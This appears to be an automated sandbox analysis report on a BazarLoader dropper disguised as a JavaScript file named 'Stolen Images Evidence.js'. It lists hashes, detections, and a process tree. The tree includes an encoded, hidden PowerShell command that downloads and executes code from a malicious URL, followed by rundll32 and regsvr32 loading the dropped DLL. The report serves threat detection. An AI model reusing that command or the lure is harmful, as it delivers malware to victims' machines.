bazarloader | a3d502012d1cded2d5a936372a08073db9b85dd2323908f9d55d802c24e8aa20

General

Target

Stolen Images Evidence.js
Size

19KB
MD5

c62b322046bee6a5a86c4fecf5dee72e
SHA1

18a381be8472fcee623c18cb1bfcf938682bef7d
SHA256

edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
SHA512

2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc

Score

10^/10

bazarloader dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bobersok.top/333g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

resource	yara_rule
behavioral1/memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp	BazarLoaderVar6
behavioral1/memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	576	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
1680	regsvr32.exe
1904	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
576	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	576	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 1372	1116	wscript.exe	27
PID 1116 wrote to memory of 1372	1116	wscript.exe	27
PID 1116 wrote to memory of 1372	1116	wscript.exe	27
PID 1372 wrote to memory of 576	1372	cmd.exe	29
PID 1372 wrote to memory of 576	1372	cmd.exe	29
PID 1372 wrote to memory of 576	1372	cmd.exe	29
PID 576 wrote to memory of 1680	576	powershell.exe	30
PID 576 wrote to memory of 1680	576	powershell.exe	30
PID 576 wrote to memory of 1680	576	powershell.exe	30
PID 576 wrote to memory of 1680	576	powershell.exe	30
PID 576 wrote to memory of 1680	576	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:576
  - - C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat
      4⤵
      Loads dropped DLL
      PID:1680

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\FHbKnfj.dat,DllRegisterServer {749609AF-8C93-44BA-A2BA-C66B158CBE86}
1⤵
- Loads dropped DLL
PID:1904

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/576-58-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp

Filesize
11.4MB

Download
memory/576-60-0x00000000023B2000-0x00000000023B4000-memory.dmp

Filesize
8KB

Download
memory/576-59-0x00000000023B0000-0x00000000023B2000-memory.dmp

Filesize
8KB

Download
memory/576-61-0x00000000023B4000-0x00000000023B7000-memory.dmp

Filesize
12KB

Download
memory/576-62-0x00000000023BB000-0x00000000023DA000-memory.dmp

Filesize
124KB

Download
memory/1116-54-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp

Filesize
8KB

Download
memory/1680-67-0x0000000000140000-0x0000000000168000-memory.dmp

Filesize
160KB

Download
memory/1904-69-0x0000000000230000-0x0000000000258000-memory.dmp

Filesize
160KB

Download

Analysis

Sharing